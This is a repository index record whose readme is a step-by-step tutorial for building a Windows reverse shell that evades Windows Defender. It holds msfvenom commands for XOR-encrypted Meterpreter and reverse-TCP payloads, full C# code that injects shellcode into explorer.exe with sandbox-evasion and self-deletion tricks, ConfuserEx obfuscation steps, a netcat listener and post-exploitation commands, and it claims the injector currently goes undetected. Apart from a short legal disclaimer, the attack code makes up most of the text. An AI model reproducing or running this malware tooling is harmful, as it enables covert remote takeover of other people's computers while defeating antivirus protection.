{"id":28762785,"url":"https://github.com/zebbern/windows-defender","last_synced_at":"2025-06-17T08:32:38.299Z","repository":{"id":294246523,"uuid":"986374832","full_name":"zebbern/Windows-Defender","owner":"zebbern","description":"This demonstrates how to build a reverse shell while bypassing windows defender [For Educational Purposes]","archived":false,"fork":false,"pushed_at":"2025-05-28T18:43:41.000Z","size":1776,"stargazers_count":7,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-06-16T06:55:04.217Z","etag":null,"topics":["blue-team","bypass-antivirus","bypass-windows-defender","cybersecurity","cybersecurity-awareness","cybersecurity-education","obfuscate","obfuscate-strings","red-team","red-team-tools","reverse-shell","window-11","windows-reverse-engineering","windows-reverse-shell"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/zebbern.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-05-19T14:09:49.000Z","updated_at":"2025-05-28T18:43:45.000Z","dependencies_parsed_at":"2025-05-20T19:31:33.303Z","dependency_job_id":null,"html_url":"https://github.com/zebbern/Windows-Defender","commit_stats":null,"previous_names":["zebbern/windows-defender"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/zebbern/Windows-Defender","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zebbern%2FWindows-Defender","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zebbern%2FWindows-Defender/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zebbern%2FWindows-Defender/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zebbern%2FWindows-Defender/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/zebbern","download_url":"https://codeload.github.com/zebbern/Windows-Defender/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zebbern%2FWindows-Defender/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":260321681,"owners_count":22991678,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["blue-team","bypass-antivirus","bypass-windows-defender","cybersecurity","cybersecurity-awareness","cybersecurity-education","obfuscate","obfuscate-strings","red-team","red-team-tools","reverse-shell","window-11","windows-reverse-engineering","windows-reverse-shell"],"created_at":"2025-06-17T08:30:38.048Z","updated_at":"2025-06-17T08:32:38.278Z","avatar_url":"https://github.com/zebbern.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"## Reverse Shell Creation \u0026 AV Evasion \n\n\u003e ## ⚠️ Warning \n\u003e **For authorized lab use only.** \n\u003e Running these techniques on systems you do **not** own or without permission is illegal. \n\u003e *This repository is provided “as is”, without warranty of any kind. The author assumes no liability for any misuse. By using any part of this code you agree to comply with all applicable laws and gain explicit permission before running it against a system.*\n\n\u003e [!Note]\n\u003e The C# injector Working Undetected From Windows Defender\n\u003e\n\u003e \u003ckbd\u003eLast Checked: 19.Mai.2025\u003c/kbd\u003e\n\u003e \n\u003e **`The C# injector Code is Public Here So i Expect it to be patched soon by someone posting this on virustotal and giving the string away so i recommend reconstructing the C# code to your own.`**\n\n### Prerequisites\n- **Visual Studio 2022** (with .NET Framework support)\n- **ConfuserEx** (download [here](https://github.com/yck1509/ConfuserEx/releases/tag/v1.0.0))\n- **Kali Linux** (for `msfvenom` payload generation)\n- Basic knowledge of C# and command-line tools.\n\n### `Generate XOR‑encrypted shell‑code/Payload`\n ```bash\n Choose which line you want to create the payload you can test all 3:\n msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=443 EXITFUNC=thread --encrypt xor --encrypt-key j\n msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=443 EXITFUNC=thread -f csharp --encrypt xor --encrypt-key j\n msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=443 EXITFUNC=thread -f csharp\n ```\n\u003e \u003cimg src=\"https://github.com/user-attachments/assets/05c31f8d-447a-44f0-b215-cd39313ee679\" width=\"900\" /\u003e\n\n### You Will Get something like this copy everything even the `Byte[]` text:\n\u003e \u003cimg src=\"https://github.com/user-attachments/assets/5b21cfac-bbed-4011-8ff0-ceeacdbd42ab\" width=\"400\" /\u003e\n\n\n\n### `Open C# Visual studio 2022`\n\u003e \u003cimg src=\"https://github.com/user-attachments/assets/d08375a7-da87-4378-b697-b0ed2e0d0bf6\" width=\"600\" /\u003e\n\n### `Choose Console App (.NET Framework)` And create Project\n\u003e \u003cimg src=\"https://github.com/user-attachments/assets/6172b649-4d36-4a4e-b622-f2d430b1ef4a\" width=\"600\" /\u003e\n\n### Paste This injector Code \u0026 edit the `namespace inject` to ur own namespace name\n\n```csharp\nusing System;\nusing System.Collections.Generic;\nusing System.Diagnostics;\nusing System.Linq;\nusing System.Runtime.InteropServices;\nusing System.Text;\nusing System.Threading.Tasks;\n\nnamespace inject\n{\n internal class Program\n {\n\n [DllImport(\"kernel32.dll\", SetLastError = true, ExactSpelling = true)]\n static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);\n\n [DllImport(\"kernel32.dll\", SetLastError = true, ExactSpelling = true)]\n static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);\n\n [DllImport(\"kernel32.dll\")]\n static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);\n\n [DllImport(\"kernel32.dll\")]\n static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);\n\n [DllImport(\"kernel32.dll\")]\n static extern void Sleep(uint dwMilliseconds);\n\n [DllImport(\"kernel32.dll\", SetLastError = true, ExactSpelling = true)]\n static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);\n\n [DllImport(\"kernel32.dll\")]\n static extern IntPtr GetCurrentProcess();\n\n [DllImport(\"kernel32.dll\", SetLastError = true)]\n static extern IntPtr FlsAlloc(IntPtr callback);\n\n static void Main(string[] args)\n {\n // Check if we're in a sandbox by calling a rare-emulated API\n if (VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0) == IntPtr.Zero)\n {\n return;\n }\n\n IntPtr ptrCheck = FlsAlloc(IntPtr.Zero);\n if (ptrCheck == null)\n {\n return;\n }\n\n // uncomment the following code if the sand box has internet\n\n //string exename = \"Injector+heuristics\";\n //if (Path.GetFileNameWithoutExtension(Environment.GetCommandLineArgs()[0]) != exename)\n //{\n // return;\n //}\n\n //if (Environment.MachineName != \"EC2AMAZ-CRPLELS\")\n //{\n // return;\n //}\n\n //try\n //{\n // HttpWebRequest req = (HttpWebRequest)WebRequest.Create(\"http://bossjdjiwn.com/\");\n // HttpWebResponse res = (HttpWebResponse)req.GetResponse();\n //\n // if (res.StatusCode == HttpStatusCode.OK)\n // {\n // return;\n // }\n //}\n //catch (WebException we)\n //{\n // Console.WriteLine(\"\\r\\nWebException Raised. The following error occured : {0}\", we.Status);\n //}\n\n // Sleep to evade in-memory scan + check if the emulator did not fast-forward through the sleep instruction\n var rand = new Random();\n uint dream = (uint)rand.Next(10000, 20000);\n double delta = dream / 1000 - 0.5;\n DateTime before = DateTime.Now;\n Sleep(dream);\n if (DateTime.Now.Subtract(before).TotalSeconds \u003c delta)\n {\n Console.WriteLine(\"Joker, get the rifle out. We're being fucked.\");\n return;\n }\n\n Process[] pList = Process.GetProcessesByName(\"explorer\");\n if (pList.Length == 0)\n {\n // Console.WriteLine(\"[-] No such process!\");\n System.Environment.Exit(1);\n }\n int processId = pList[0].Id;\n // 0x001F0FFF = PROCESS_ALL_ACCESS\n IntPtr hProcess = OpenProcess(0x001F0FFF, false, processId);\n IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40);\n\n\n\n\n By zebbern SHELLCODE PAYLOAD HERE CHOOSE FROM ABOVE THIS TEXT PUT IT IN KALI PASTE THE SCRIPT\n\n\n\n\n // XOR-decrypt the shellcode\n for (int i = 0; i \u003c buf.Length; i++)\n {\n buf[i] = (byte)(buf[i] ^ (byte)'j');\n }\n\n IntPtr outSize;\n WriteProcessMemory(hProcess, addr, buf, buf.Length, out outSize);\n IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);\n\n // Launch a separate process to delete the executable\n string currentExecutablePath = Process.GetCurrentProcess().MainModule.FileName;\n Process.Start(new ProcessStartInfo()\n {\n Arguments = \"/C choice /C Y /N /D Y /T 3 \u0026 Del \\\"\" + currentExecutablePath + \"\\\"\",\n WindowStyle = ProcessWindowStyle.Hidden,\n CreateNoWindow = true,\n FileName = \"cmd.exe\"\n });\n\n }\n }\n}\n\n```\n\n### Now Copy The Code We Generated From `msfvenom` Above\n#### Replace this code line in the c# script \n```\nBy zebbern SHELLCODE PAYLOAD HERE CHOOSE FROM ABOVE THIS TEXT PUT IT IN KALI PASTE THE SCRIPT\n```\n#### With the generated msfvenom payload\n```\nbyte[] buf = new byte[460] {0x96,0x22 etc...............0xbf};\n```\n### Now It should look something like this:\n\u003e \u003cimg src=\"https://github.com/user-attachments/assets/e05bb4fb-8afd-4939-b343-4a8237e72887\" width=\"600\" /\u003e\n\n### Now go to `Configuration Manager...` \u0026 Make it like in the pictures\n\u003e \u003cimg src=\"https://github.com/user-attachments/assets/ac48d688-1c70-420f-9e65-4819fe0d7a1d\" width=\"400\" /\u003e\n\u003e \u003cimg src=\"https://github.com/user-attachments/assets/e0877672-bd3b-409f-93b0-a164ef56b138\" width=\"600\" /\u003e\n\n#### Hide the Console Window \n1. **Project → Properties → Application → Output Type → _Windows Application_** \n2. Re‑build (**Release | x64**).\n\n### Now build the solution\n\u003e \u003cimg src=\"https://github.com/user-attachments/assets/3ed2f025-7b01-4436-ba70-659086f63420\" width=\"600\" /\u003e\n\n### If you now see in console: `Build success` You have done correct\n\u003e \u003cimg src=\"https://github.com/user-attachments/assets/3a7d3a30-abea-4d81-92e3-2bf6ed489f53\" width=\"600\" /\u003e\n\n#### Now Lets Obfuscate Using (ConfuserEx)\n* Drag the fresh `.exe` into ConfuserEx \n* **Preset = Normal** → add ~10 random protections → **Protect** \n* The obfuscated binary appears in `/Confused/`.\n\n\u003e \u003cimg src=\"https://github.com/user-attachments/assets/eff08d19-8247-4bb8-a74d-772d3d12e4b5\" width=\"600\" /\u003e\n\n### Go to settings Click the .exe listed and click +\n\u003e \u003cimg src=\"https://github.com/user-attachments/assets/568fc657-8f72-4223-8513-4393a8bd8f72\" width=\"600\" /\u003e\n\n### Make it to Preset Normal and click +\n`Add these in a random order it should be 10`\n\u003e \u003cimg src=\"https://github.com/user-attachments/assets/3cf413bf-11e2-4fde-b6ea-94c321807f9c\" width=\"300\" /\u003e\n\n### Click `Done` Then Click `Protect`\n\u003e \u003cimg src=\"https://github.com/user-attachments/assets/d1a31619-389e-4ea1-8f3c-c42e185d8af9\" width=\"600\" /\u003e\n\n\n## Run \u0026 Test\n1. **Listener** (attacker):\n ```bash\n rlwrap -cAr nc -lvnp 443\n ```\n2. **Target**: double‑click the obfuscated payload. \n3. **Success** → a shell or Meterpreter session connects back.\n\n\u003e **Tip:** use a high‑numbered port (e.g. 443, 8443) that the firewall allows.\n\u003e \u003cimg src=\"https://github.com/user-attachments/assets/c5b71f7e-f34f-4c52-a056-fb72cceaf702\" width=\"600\" /\u003e)\n\n\n## Post‑exploitation Cheatsheet\n```text\nwhoami\nsysteminfo\nipconfig /all\nnet users\nnet localgroup administrators\n```\n\n---\n\n## Troubleshooting\n\n| Issue | Fix |\n|-------|-----|\n| Payload deleted on save | Verify EXE is obfuscated **and** shell‑code is XOR‑encoded |\n| No callback | Check IP/LPORT, outbound firewall, AV quarantine |\n| Program exits instantly | Sandbox/timing checks triggered – comment them for lab use |\n| ConfuserEx “resource not found” | Make sure you built **Release | x64** before obfuscation |\n\n---\n\n## Credits\n* [Zebbern](https://github.com/zebbern)\n* [ConfuserEx](https://github.com/yck1509/ConfuserEx)\n\n---\n\n## Appendix – One‑liner XOR Encoder (PowerShell)\n```powershell\n# Encode sc.bin with key 0x6A\n[byte[]]$sc = Get-Content sc.bin -Encoding Byte\n$key = 0x6A\n$enc = $sc | ForEach-Object { $_ -bxor $key }\n[System.IO.File]::WriteAllBytes('sc_xor.bin', $enc)\n```\n\nHappy (legal) hacking! 🛡️\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fzebbern%2Fwindows-defender","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fzebbern%2Fwindows-defender","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fzebbern%2Fwindows-defender/lists"}